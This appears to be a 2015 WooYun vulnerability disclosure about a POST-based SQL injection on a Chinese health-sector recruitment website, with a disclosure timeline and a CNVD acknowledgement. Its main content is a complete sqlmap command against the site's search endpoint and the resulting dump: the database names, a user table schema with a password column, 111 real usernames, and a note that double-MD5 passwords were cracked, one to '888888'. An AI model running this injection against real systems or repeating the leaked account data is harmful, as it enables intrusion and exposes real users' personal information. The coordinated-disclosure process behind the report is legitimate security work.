当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136575

漏洞标题:中国卫生人才网某处POST注入一只

相关厂商:中国卫生人才网

漏洞作者: 冷白开。

提交时间:2015-08-27 11:19

修复时间:2015-10-14 02:24

公开时间:2015-10-14 02:24

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-27: 细节已通知厂商并且等待厂商处理中
2015-08-30: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-09: 细节向核心白帽子及相关领域专家公开
2015-09-19: 细节向普通白帽子公开
2015-09-29: 细节向实习白帽子公开
2015-10-14: 细节向公众公开

简要描述:

中国卫生人才网某处POST注入野生一只

详细说明:

注入命令:sqlmap.py -u "http://**.**.**.**/rcjl/outersearchPositionAction.do" --data "radiobutton=radiobutton1&image=88952634&image=%EF%BF%BD%DF%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&select=88952634&select2=88952634&select3=88952634&dwmc=--%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EB%B5%A5%CE%BB%2F%D6%B0%CE%BB%EF%BF%BD%D8%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD--" --dbs

跑出数据库内容

QQ截图20150824163849.png

脱点数据证明危害,user太多,跑一点点我就中断了

available databases [9]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] NEWTES
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] UNIPORTAL
[*] WMSYS
Database: UNIPORTAL
[1 table]
+---------+
| UP_USER |
+---------+
Database: UNIPORTAL
Table: UP_USER
[5 columns]
+--------------------+----------+
| Column | Type |
+--------------------+----------+
| UPUS_EMAIL | VARCHAR2 |
| UPUS_ID | VARCHAR2 |
| UPUS_NAME | VARCHAR2 |
| UPUS_PASSWORD | VARCHAR2 |
| UPUS_REGISTER_TIME | DATE |
+--------------------+----------+
Database: UNIPORTAL
Table: UP_USER
[111 entries]
+---------------------+
| UPUS_NAME |
+---------------------+
| youxiuzheng1 |
| zhanghaishan |
| jiangyang0123 |
| wangbashabi |
| ysy2006 |
| Huangjun |
| aaaa11 |
| sweetdot6 |
| tanyanping |
| ljf6898 |
| zhlili |
| zhangchunmei16 |
| rihua |
| ganhuanji |
| huangyien |
| tqtsxfsrm |
| lianmin7097@**.**.**.** |
| liushuwen |
| sansanaa |
| lijine |
| Luxiaoling |
| liu991150308 |
| B19721103 |
| abob |
| yuanzhongfeng690407 |
| pengjh2 |
| hn90 |
| wwww |
| moliping101 |
| gejuan |
| liujiaying1234 |
| fangfangchen |
| tqtscfsrm |
| zhouning |
| niuxiaoqian6 |
| lydia_han |
| LiXiangLian |
| lijianlan8507 |
| zhangyuru |
| cuiping |
| lianggueizhen |
| chenguoxue888 |
| aammpp |
| weiminlin |
| piyumei |
| chenminfeng |
| liangxia123 |
| qinaiping |
| linju1234 |
| hawkli7743 |
| yangchuanli |
| shihong1 |
| linguifen |
| poiuytrewq5602437 |
| liufeng_hua |
| yangxiaojuan2000 |
| qyxh |
| thxzyyb |
| lyf80 |
| hujingxian |
| chuwenwen1 |
| yinxiaochun |
| xiaocao520 |
| weibijing |
| zhangxiao2 |
| B2588 |
| liangguang |
| wuqianqian8566 |
| dongxue |
| caiyuemin |
| lialong |
| hlj_lxm808 |
| zhongxiuyan |
| gmrmyydyf |
| cuihaijie |
| maiyumei |
| liufang995 |
| ningtang2 |
| wdzgxujing |
| wyp3151953 |
| yiyanhua |
| Tangchunyan |
| xcjwlj |
| yetianliu |
| xuchenhong |
| wangynyan |
| www6676 |
| bingxueqingzi |
| kpxjxxjie |
| huangxiaoying |
| zhaoyufei |
| charly |
| LL0206 |
| lianghaimei |
| liuxiaohua0 |
| hebqiji |
| zengxiaoyi |
| pby001 |
| zhandan |
| jiaxing_680 |
| yangni |
| sunli608 |
| songxiaojie |
| sssdxl |
| yanyanli_6 |
| yuannana |
| gumujie |
| lifang0918 |
| shengminghua |
| yulili |
| mugua |
+---------------------+

2.png


密码是二次加密的MD5密码,解密两次才能解密出来,第一条密码最终是888888

漏洞证明:

综上

修复方案:

你们懂

版权声明:转载请注明来源 冷白开。@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-08-30 02:22

厂商回复:

CNVD确认并复现所述情况,已经由CNVD向网站运维人员直接通报.

最新状态:

暂无